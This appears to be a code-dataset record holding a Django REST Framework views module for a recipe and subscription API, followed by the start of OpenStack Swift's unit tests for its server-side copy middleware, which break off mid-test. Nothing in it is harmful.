serializers.FollowSerializer return self.serializer_class @action(['get'], detail=False, permission_classes=(IsAuthenticated,)) @swagger_auto_schema(auto_schema=EmptyAutoSchema) def me(self, request, pk=None): serializer = self.get_serializer(self.request.user) return Response(serializer.data, status=status.HTTP_200_OK) @action(['post'], detail=False, permission_classes=(IsAuthenticated,)) @swagger_auto_schema(request_body=SetPasswordSerializer, responses={204: 'No Content'}) def set_password(self, request, *args, **kwargs): serializer = self.get_serializer(data=request.data) serializer.is_valid(raise_exception=True) self.request.user.set_password( serializer.validated_data['new_password'] ) self.request.user.save() return Response(status=status.HTTP_204_NO_CONTENT) @action(['get'], detail=False, pagination_class=FollowPagination, permission_classes=[IsAuthenticated]) @swagger_auto_schema(responses={201: serializers.SubscriptionsSerializer}) def subscriptions(self, request): queryset = Follow.objects.filter(user=request.user) if not queryset.exists(): return Response({'error': 'Вы еще ни на кого не подписаны'}, status=status.HTTP_400_BAD_REQUEST) page = self.paginate_queryset(queryset) if page: serializer = self.get_serializer( page, many=True, context={'request': request} ) return self.get_paginated_response(serializer.data) serializer = self.get_serializer(queryset, many=True, context={'request': request}) return Response(serializer.data) @action(['get'], detail=True, permission_classes=[IsAuthenticated]) @swagger_auto_schema(manual_parameters=follower_params, responses={201: serializers.SubscriptionsSerializer}) def subscribe(self, request, pk=None): user, author = self.following_validate(request, pk) if not author: return Response({'error': user}, status=status.HTTP_400_BAD_REQUEST) data = {'user': user.id, 'author': author.id} serializer = self.get_serializer( data=data, context={'request': request} ) serializer.is_valid(raise_exception=True) serializer.save() 
return Response(serializer.data, status=status.HTTP_201_CREATED) @subscribe.mapping.delete def delete_subscribe(self, request, pk=None): user, author, subscribe = self.following_validate(request, pk, delete=True) if not author or not subscribe: return Response({'error': user}, status=status.HTTP_400_BAD_REQUEST) subscribe.delete() return Response(status=status.HTTP_204_NO_CONTENT) def following_validate(self, request, pk, delete=False): user = request.user if not User.objects.filter(id=pk).exists(): if delete: return 'Такого пользователя еще нет', False, False return 'Такого пользователя еще нет', False author = get_object_or_404(User, id=pk) if delete: if not Follow.objects.filter(user=user, author=author).exists(): return ('У вас еще нет этого пользователя в подписках', True, False) else: return (user, author, get_object_or_404(Follow, user=user, author=author)) return user, author @multi_method_decorator( names=['create', 'update', 'partial_update', 'destroy'], decorator=swagger_auto_schema(auto_schema=None) ) class TagViewSet(ModelViewSet): queryset = Tag.objects.all() serializer_class = serializers.TagSerializer permission_classes = (IsAdminOrReadOnly,) @multi_method_decorator( names=['create', 'update', 'partial_update', 'destroy'], decorator=swagger_auto_schema(auto_schema=None) ) class IngredientsViewSet(ModelViewSet): queryset = Ingredient.objects.all() serializer_class = serializers.IngredientSerializer permission_classes = (IsAdminOrReadOnly,) filter_backends = (filters.SearchFilter,) search_fields = ('name', ) @method_decorator( swagger_auto_schema( request_body=recipe_request_body, responses={201: serializers.RecipeSerializer} ), name='create' ) @method_decorator( swagger_auto_schema( request_body=recipe_request_body, responses={200: serializers.RecipeSerializer} ), name='update' ) @method_decorator( swagger_auto_schema(auto_schema=None), name='partial_update' ) class RecipeViewSet(ModelViewSet): queryset = Recipe.objects.all() serializer_class = 
serializers.RecipeSerializer pagination_class = LimitPagination permission_classes = (RecipePermission,) filter_backends = (GlobalFilterBackend,) filterset_fields = ('author', ) def get_serializer_class(self): if self.action == 'favorite': return serializers.FavoriteSerializer elif self.action == 'shopping_cart': return serializers.PurchaseSerializer return self.serializer_class @action(['get'], detail=True, permission_classes=[IsAuthenticated]) @swagger_auto_schema(responses={201: serializers.RecipeLiteSerializer}) def favorite(self, request, pk=None): return self.alt_endpoint_create(request, pk) @favorite.mapping.delete def delete_favorite(self, request, pk=None): return self.alt_endpoint_delete(request, pk, favorite=True) @action(['get'], detail=True, permission_classes=[IsAuthenticated]) @swagger_auto_schema(responses={201: serializers.RecipeLiteSerializer}) def shopping_cart(self, request, pk=None): return self.alt_endpoint_create(request, pk) @shopping_cart.mapping.delete def delete_shopping_cart(self, request, pk=None): return self.alt_endpoint_delete(request, pk, cart=True) @action(['get'], detail=False, permission_classes=(IsAuthenticated,)) @swagger_auto_schema(auto_schema=EmptyAutoSchema, responses={200: 'Download', 401: 'NotAuthorized'}) def download_shopping_cart(self, request): ingredients = ( IngredientInRecipe.objects .select_related('ingredient', 'recipe') .prefetch_related('purchases') .filter(recipe__purchases__user=request.user) .values_list('ingredient__name', 'ingredient__measurement_unit') .annotate(amount=Sum('amount')) ) response = HttpResponse(content_type='text/csv') response['Content-Disposition'] = ('attachment;' 'filename="Your_shopping_list.csv"') writer = csv.writer(response) writer.writerow(['Ингредиент', 'Единица измерения', 'Количество']) for ingredient in ingredients: writer.writerow(ingredient) return response def alt_endpoint_create(self, request, pk): verdict, recipe, user = self.recipe_validate(request, pk) if not verdict: 
return recipe data = { 'user': user.id, 'recipe': recipe.id, } serializer = self.get_serializer(data=data, context={'request': request}) serializer.is_valid(raise_exception=True) serializer.save() return Response(serializer.data, status=status.HTTP_201_CREATED) def alt_endpoint_delete(self, request, pk, favorite=False, cart=False): verdict, obj = self.recipe_validate(request, pk, delete=True, favorite=favorite, cart=cart) if not verdict: return obj obj.delete() return Response(status=status.HTTP_204_NO_CONTENT) def recipe_validate(self, request, pk, delete=False, favorite=False, cart=False): user = request.user if not Recipe.objects.filter(id=pk).exists(): return False, Response({'error': 'Такого рецепта еще нет'}, status=status.HTTP_400_BAD_REQUEST), None recipe = get_object_or_404(Recipe, id=pk) if delete: model_answer = { 'favorite': (Favorite, 'избранном'), 'cart': (Purchase, 'списке покупок') } if favorite: model, answer = model_answer.get('favorite') if cart: model, answer = model_answer.get('cart') if not model.objects.filter(user=user, recipe=recipe).exists(): return False, Response( {'error': f'Такого рецепта еще нет в вашем {answer}'}, status=status.HTTP_400_BAD_REQUEST ) return True, get_object_or_404(model, user=user, recipe=recipe) return True, recipe, user
39.119454
79
0.655819
import csv from django.contrib.auth import get_user_model from django.db.models.aggregates import Sum from django.http.response import HttpResponse from django.utils.decorators import method_decorator from djoser.serializers import SetPasswordSerializer from djoser.views import TokenCreateView from drf_yasg.utils import swagger_auto_schema from rest_framework import filters, status from rest_framework.decorators import action from rest_framework.generics import get_object_or_404 from rest_framework.permissions import IsAuthenticated from rest_framework.response import Response from rest_framework.viewsets import ModelViewSet from api import serializers from api.decorators import multi_method_decorator from api.docs.schemas import (EmptyAutoSchema, follower_params, recipe_request_body) from api.filters import GlobalFilterBackend from api.pagination import FollowPagination, LimitPagination from api.permissions import (IsAdminOrReadIfAuthenticatedObjPerm, IsAdminOrReadOnly, RecipePermission) from food.models import Ingredient, IngredientInRecipe, Recipe, Tag from interactions.models import Favorite, Follow, Purchase User = get_user_model() class CustomTokenCreateView(TokenCreateView): def _action(self, serializer): response = super()._action(serializer) response.status_code = status.HTTP_201_CREATED return response @multi_method_decorator( names=['update', 'partial_update', 'destroy'], decorator=swagger_auto_schema(auto_schema=None) ) class CustomUserViewSet(ModelViewSet): queryset = User.objects.all().order_by('id') serializer_class = serializers.CustomUserSerializer pagination_class = LimitPagination permission_classes = (IsAdminOrReadIfAuthenticatedObjPerm,) def get_serializer_class(self): if self.action in ('list', 'retrieve', 'me'): return serializers.CustomUserGetSerializer elif self.action == 'set_password': return SetPasswordSerializer elif self.action == 'subscriptions': return serializers.SubscriptionsSerializer elif self.action == 'subscribe': return 
serializers.FollowSerializer return self.serializer_class @action(['get'], detail=False, permission_classes=(IsAuthenticated,)) @swagger_auto_schema(auto_schema=EmptyAutoSchema) def me(self, request, pk=None): serializer = self.get_serializer(self.request.user) return Response(serializer.data, status=status.HTTP_200_OK) @action(['post'], detail=False, permission_classes=(IsAuthenticated,)) @swagger_auto_schema(request_body=SetPasswordSerializer, responses={204: 'No Content'}) def set_password(self, request, *args, **kwargs): serializer = self.get_serializer(data=request.data) serializer.is_valid(raise_exception=True) self.request.user.set_password( serializer.validated_data['new_password'] ) self.request.user.save() return Response(status=status.HTTP_204_NO_CONTENT) @action(['get'], detail=False, pagination_class=FollowPagination, permission_classes=[IsAuthenticated]) @swagger_auto_schema(responses={201: serializers.SubscriptionsSerializer}) def subscriptions(self, request): queryset = Follow.objects.filter(user=request.user) if not queryset.exists(): return Response({'error': 'Вы еще ни на кого не подписаны'}, status=status.HTTP_400_BAD_REQUEST) page = self.paginate_queryset(queryset) if page: serializer = self.get_serializer( page, many=True, context={'request': request} ) return self.get_paginated_response(serializer.data) serializer = self.get_serializer(queryset, many=True, context={'request': request}) return Response(serializer.data) @action(['get'], detail=True, permission_classes=[IsAuthenticated]) @swagger_auto_schema(manual_parameters=follower_params, responses={201: serializers.SubscriptionsSerializer}) def subscribe(self, request, pk=None): user, author = self.following_validate(request, pk) if not author: return Response({'error': user}, status=status.HTTP_400_BAD_REQUEST) data = {'user': user.id, 'author': author.id} serializer = self.get_serializer( data=data, context={'request': request} ) serializer.is_valid(raise_exception=True) serializer.save() 
return Response(serializer.data, status=status.HTTP_201_CREATED) @subscribe.mapping.delete def delete_subscribe(self, request, pk=None): user, author, subscribe = self.following_validate(request, pk, delete=True) if not author or not subscribe: return Response({'error': user}, status=status.HTTP_400_BAD_REQUEST) subscribe.delete() return Response(status=status.HTTP_204_NO_CONTENT) def following_validate(self, request, pk, delete=False): user = request.user if not User.objects.filter(id=pk).exists(): if delete: return 'Такого пользователя еще нет', False, False return 'Такого пользователя еще нет', False author = get_object_or_404(User, id=pk) if delete: if not Follow.objects.filter(user=user, author=author).exists(): return ('У вас еще нет этого пользователя в подписках', True, False) else: return (user, author, get_object_or_404(Follow, user=user, author=author)) return user, author @multi_method_decorator( names=['create', 'update', 'partial_update', 'destroy'], decorator=swagger_auto_schema(auto_schema=None) ) class TagViewSet(ModelViewSet): queryset = Tag.objects.all() serializer_class = serializers.TagSerializer permission_classes = (IsAdminOrReadOnly,) @multi_method_decorator( names=['create', 'update', 'partial_update', 'destroy'], decorator=swagger_auto_schema(auto_schema=None) ) class IngredientsViewSet(ModelViewSet): queryset = Ingredient.objects.all() serializer_class = serializers.IngredientSerializer permission_classes = (IsAdminOrReadOnly,) filter_backends = (filters.SearchFilter,) search_fields = ('name', ) @method_decorator( swagger_auto_schema( request_body=recipe_request_body, responses={201: serializers.RecipeSerializer} ), name='create' ) @method_decorator( swagger_auto_schema( request_body=recipe_request_body, responses={200: serializers.RecipeSerializer} ), name='update' ) @method_decorator( swagger_auto_schema(auto_schema=None), name='partial_update' ) class RecipeViewSet(ModelViewSet): queryset = Recipe.objects.all() serializer_class = 
serializers.RecipeSerializer pagination_class = LimitPagination permission_classes = (RecipePermission,) filter_backends = (GlobalFilterBackend,) filterset_fields = ('author', ) def get_serializer_class(self): if self.action == 'favorite': return serializers.FavoriteSerializer elif self.action == 'shopping_cart': return serializers.PurchaseSerializer return self.serializer_class @action(['get'], detail=True, permission_classes=[IsAuthenticated]) @swagger_auto_schema(responses={201: serializers.RecipeLiteSerializer}) def favorite(self, request, pk=None): return self.alt_endpoint_create(request, pk) @favorite.mapping.delete def delete_favorite(self, request, pk=None): return self.alt_endpoint_delete(request, pk, favorite=True) @action(['get'], detail=True, permission_classes=[IsAuthenticated]) @swagger_auto_schema(responses={201: serializers.RecipeLiteSerializer}) def shopping_cart(self, request, pk=None): return self.alt_endpoint_create(request, pk) @shopping_cart.mapping.delete def delete_shopping_cart(self, request, pk=None): return self.alt_endpoint_delete(request, pk, cart=True) @action(['get'], detail=False, permission_classes=(IsAuthenticated,)) @swagger_auto_schema(auto_schema=EmptyAutoSchema, responses={200: 'Download', 401: 'NotAuthorized'}) def download_shopping_cart(self, request): ingredients = ( IngredientInRecipe.objects .select_related('ingredient', 'recipe') .prefetch_related('purchases') .filter(recipe__purchases__user=request.user) .values_list('ingredient__name', 'ingredient__measurement_unit') .annotate(amount=Sum('amount')) ) response = HttpResponse(content_type='text/csv') response['Content-Disposition'] = ('attachment;' 'filename="Your_shopping_list.csv"') writer = csv.writer(response) writer.writerow(['Ингредиент', 'Единица измерения', 'Количество']) for ingredient in ingredients: writer.writerow(ingredient) return response def alt_endpoint_create(self, request, pk): verdict, recipe, user = self.recipe_validate(request, pk) if not verdict: 
return recipe data = { 'user': user.id, 'recipe': recipe.id, } serializer = self.get_serializer(data=data, context={'request': request}) serializer.is_valid(raise_exception=True) serializer.save() return Response(serializer.data, status=status.HTTP_201_CREATED) def alt_endpoint_delete(self, request, pk, favorite=False, cart=False): verdict, obj = self.recipe_validate(request, pk, delete=True, favorite=favorite, cart=cart) if not verdict: return obj obj.delete() return Response(status=status.HTTP_204_NO_CONTENT) def recipe_validate(self, request, pk, delete=False, favorite=False, cart=False): user = request.user if not Recipe.objects.filter(id=pk).exists(): return False, Response({'error': 'Такого рецепта еще нет'}, status=status.HTTP_400_BAD_REQUEST), None recipe = get_object_or_404(Recipe, id=pk) if delete: model_answer = { 'favorite': (Favorite, 'избранном'), 'cart': (Purchase, 'списке покупок') } if favorite: model, answer = model_answer.get('favorite') if cart: model, answer = model_answer.get('cart') if not model.objects.filter(user=user, recipe=recipe).exists(): return False, Response( {'error': f'Такого рецепта еще нет в вашем {answer}'}, status=status.HTTP_400_BAD_REQUEST ) return True, get_object_or_404(model, user=user, recipe=recipe) return True, recipe, user
true
true
f705de9ae40aeb7ac96605765acb1cf9903cb9e3
70,522
py
Python
test/unit/common/middleware/test_copy.py
gyaozhou/swift-read
16fe18ae3be59a095f3bafdd69fe74b48a2771cb
[ "Apache-2.0" ]
null
null
null
test/unit/common/middleware/test_copy.py
gyaozhou/swift-read
16fe18ae3be59a095f3bafdd69fe74b48a2771cb
[ "Apache-2.0" ]
null
null
null
test/unit/common/middleware/test_copy.py
gyaozhou/swift-read
16fe18ae3be59a095f3bafdd69fe74b48a2771cb
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python # Copyright (c) 2015 OpenStack Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import mock import unittest from hashlib import md5 from six.moves import urllib from swift.common import swob from swift.common.middleware import copy from swift.common.storage_policy import POLICIES from swift.common.swob import Request, HTTPException from swift.common.utils import closing_if_possible from test.unit import patch_policies, debug_logger, FakeMemcache, FakeRing from test.unit.common.middleware.helpers import FakeSwift from test.unit.proxy.controllers.test_obj import set_http_connect, \ PatchedObjControllerApp class TestCopyConstraints(unittest.TestCase): def test_validate_copy_from(self): req = Request.blank( '/v/a/c/o', headers={'x-copy-from': 'c/o2'}) src_cont, src_obj = copy._check_copy_from_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'o2') req = Request.blank( '/v/a/c/o', headers={'x-copy-from': 'c/subdir/o2'}) src_cont, src_obj = copy._check_copy_from_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'subdir/o2') req = Request.blank( '/v/a/c/o', headers={'x-copy-from': '/c/o2'}) src_cont, src_obj = copy._check_copy_from_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'o2') def test_validate_bad_copy_from(self): req = Request.blank( '/v/a/c/o', headers={'x-copy-from': 'bad_object'}) self.assertRaises(HTTPException, copy._check_copy_from_header, req) def 
test_validate_destination(self): req = Request.blank( '/v/a/c/o', headers={'destination': 'c/o2'}) src_cont, src_obj = copy._check_destination_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'o2') req = Request.blank( '/v/a/c/o', headers={'destination': 'c/subdir/o2'}) src_cont, src_obj = copy._check_destination_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'subdir/o2') req = Request.blank( '/v/a/c/o', headers={'destination': '/c/o2'}) src_cont, src_obj = copy._check_destination_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'o2') def test_validate_bad_destination(self): req = Request.blank( '/v/a/c/o', headers={'destination': 'bad_object'}) self.assertRaises(HTTPException, copy._check_destination_header, req) class TestServerSideCopyMiddleware(unittest.TestCase): def setUp(self): self.app = FakeSwift() self.ssc = copy.filter_factory({})(self.app) self.ssc.logger = self.app.logger def tearDown(self): self.assertEqual(self.app.unclosed_requests, {}) def call_app(self, req, app=None, expect_exception=False): if app is None: app = self.app self.authorized = [] def authorize(req): self.authorized.append(req) if 'swift.authorize' not in req.environ: req.environ['swift.authorize'] = authorize req.headers.setdefault("User-Agent", "Bruce Wayne") status = [None] headers = [None] def start_response(s, h, ei=None): status[0] = s headers[0] = h body_iter = app(req.environ, start_response) body = '' caught_exc = None try: # appease the close-checker with closing_if_possible(body_iter): for chunk in body_iter: body += chunk except Exception as exc: if expect_exception: caught_exc = exc else: raise if expect_exception: return status[0], headers[0], body, caught_exc else: return status[0], headers[0], body def call_ssc(self, req, **kwargs): return self.call_app(req, app=self.ssc, **kwargs) def assertRequestEqual(self, req, other): self.assertEqual(req.method, other.method) self.assertEqual(req.path, other.path) 
    def test_no_object_in_path_pass_through(self):
        """Container-level requests bypass the copy middleware entirely."""
        self.app.register('PUT', '/v1/a/c', swob.HTTPCreated, {})
        req = Request.blank('/v1/a/c', method='PUT')
        status, headers, body = self.call_ssc(req)
        self.assertEqual(status, '201 Created')
        # exactly one authorization, for the pass-through request itself
        self.assertEqual(len(self.authorized), 1)
        self.assertRequestEqual(req, self.authorized[0])

    def test_object_pass_through_methods(self):
        """Non-copy object methods pass through without being rewritten."""
        for method in ['DELETE', 'GET', 'HEAD', 'REPLICATE']:
            self.app.register(method, '/v1/a/c/o', swob.HTTPOk, {})
            req = Request.blank('/v1/a/c/o', method=method)
            status, headers, body = self.call_ssc(req)
            self.assertEqual(status, '200 OK')
            self.assertEqual(len(self.authorized), 1)
            self.assertRequestEqual(req, self.authorized[0])
            # pass-through must not leave the COPY-rewrite marker behind
            self.assertNotIn('swift.orig_req_method', req.environ)

    def test_basic_put_with_x_copy_from(self):
        """PUT + X-Copy-From becomes a source GET followed by a PUT,
        with both halves authorized and tagged with swift source 'SSC'."""
        self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
        self.app.register('PUT', '/v1/a/c/o2', swob.HTTPCreated, {})
        req = Request.blank('/v1/a/c/o2',
                            environ={'REQUEST_METHOD': 'PUT'},
                            headers={'Content-Length': '0',
                                     'X-Copy-From': 'c/o'})
        status, headers, body = self.call_ssc(req)
        self.assertEqual(status, '201 Created')
        # response advertises where the data came from
        self.assertTrue(('X-Copied-From', 'c/o') in headers)
        # both the source GET and the destination PUT were authorized
        self.assertEqual(len(self.authorized), 2)
        self.assertEqual('GET', self.authorized[0].method)
        self.assertEqual('/v1/a/c/o', self.authorized[0].path)
        self.assertEqual('PUT', self.authorized[1].method)
        self.assertEqual('/v1/a/c/o2', self.authorized[1].path)
        self.assertEqual(self.app.swift_sources[0], 'SSC')
        self.assertEqual(self.app.swift_sources[1], 'SSC')
        # For basic test cases, assert orig_req_method behavior
        self.assertNotIn('swift.orig_req_method', req.environ)

    def test_static_large_object_manifest(self):
        self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
                          {'X-Static-Large-Object': 'True',
                           'Etag': 'should not be sent'}, 'passed')
        self.app.register('PUT', '/v1/a/c/o2?multipart-manifest=put',
                          swob.HTTPCreated, {})
        req = Request.blank('/v1/a/c/o2?multipart-manifest=get',
                            environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0', 'X-Copy-From': 'c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(2, len(self.app.calls)) self.assertEqual('GET', self.app.calls[0][0]) get_path, qs = self.app.calls[0][1].split('?') params = urllib.parse.parse_qs(qs) self.assertDictEqual( {'format': ['raw'], 'multipart-manifest': ['get']}, params) self.assertEqual(get_path, '/v1/a/c/o') self.assertEqual(self.app.calls[1], ('PUT', '/v1/a/c/o2?multipart-manifest=put')) req_headers = self.app.headers[1] self.assertNotIn('X-Static-Large-Object', req_headers) self.assertNotIn('Etag', req_headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o2', self.authorized[1].path) def test_static_large_object(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {'X-Static-Large-Object': 'True', 'Etag': 'should not be sent'}, 'passed') self.app.register('PUT', '/v1/a/c/o2', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(self.app.calls, [ ('GET', '/v1/a/c/o'), ('PUT', '/v1/a/c/o2')]) req_headers = self.app.headers[1] self.assertNotIn('X-Static-Large-Object', req_headers) self.assertNotIn('Etag', req_headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o2', self.authorized[1].path) def test_basic_put_with_x_copy_from_across_container(self): self.app.register('GET', '/v1/a/c1/o1', 
swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c2/o2', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c1/o1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c1/o1') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c1/o1', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c2/o2', self.authorized[1].path) def test_basic_put_with_x_copy_from_across_container_and_account(self): self.app.register('GET', '/v1/a1/c1/o1', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a2/c2/o2', swob.HTTPCreated, {}, 'passed') req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c1/o1', 'X-Copy-From-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c1/o1') in headers) self.assertTrue(('X-Copied-From-Account', 'a1') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a1/c1/o1', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a2/c2/o2', self.authorized[1].path) def test_copy_non_zero_content_length(self): req = Request.blank('/v1/a/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '10', 'X-Copy-From': 'c1/o1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '400 Bad Request') def test_copy_non_zero_content_length_with_account(self): req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '10', 'X-Copy-From': 'c1/o1', 'X-Copy-From-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '400 Bad 
Request') def test_copy_with_slashes_in_x_copy_from(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o/o2'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_with_slashes_in_x_copy_from_and_account(self): self.app.register('GET', '/v1/a1/c1/o/o1', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a2/c2/o2', swob.HTTPCreated, {}) req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c1/o/o1', 'X-Copy-From-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c1/o/o1') in headers) self.assertTrue(('X-Copied-From-Account', 'a1') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a1/c1/o/o1', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a2/c2/o2', self.authorized[1].path) def test_copy_with_spaces_in_x_copy_from(self): self.app.register('GET', '/v1/a/c/o o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) # space in soure path req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o%20o2'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = 
calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o o2', path) self.assertTrue(('X-Copied-From', 'c/o%20o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o%20o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_with_spaces_in_x_copy_from_and_account(self): self.app.register('GET', '/v1/a/c/o o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) # space in soure path req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o%20o2', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o o2', path) self.assertTrue(('X-Copied-From', 'c/o%20o2') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o%20o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_copy_with_leading_slash_in_x_copy_from(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) # repeat tests with leading / req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('X-Copied-From', 'c/o') in headers) 
self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_with_leading_slash_in_x_copy_from_and_account(self): # repeat tests with leading / self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_copy_with_leading_slash_and_slashes_in_x_copy_from(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o/o2'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o/o2', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) 
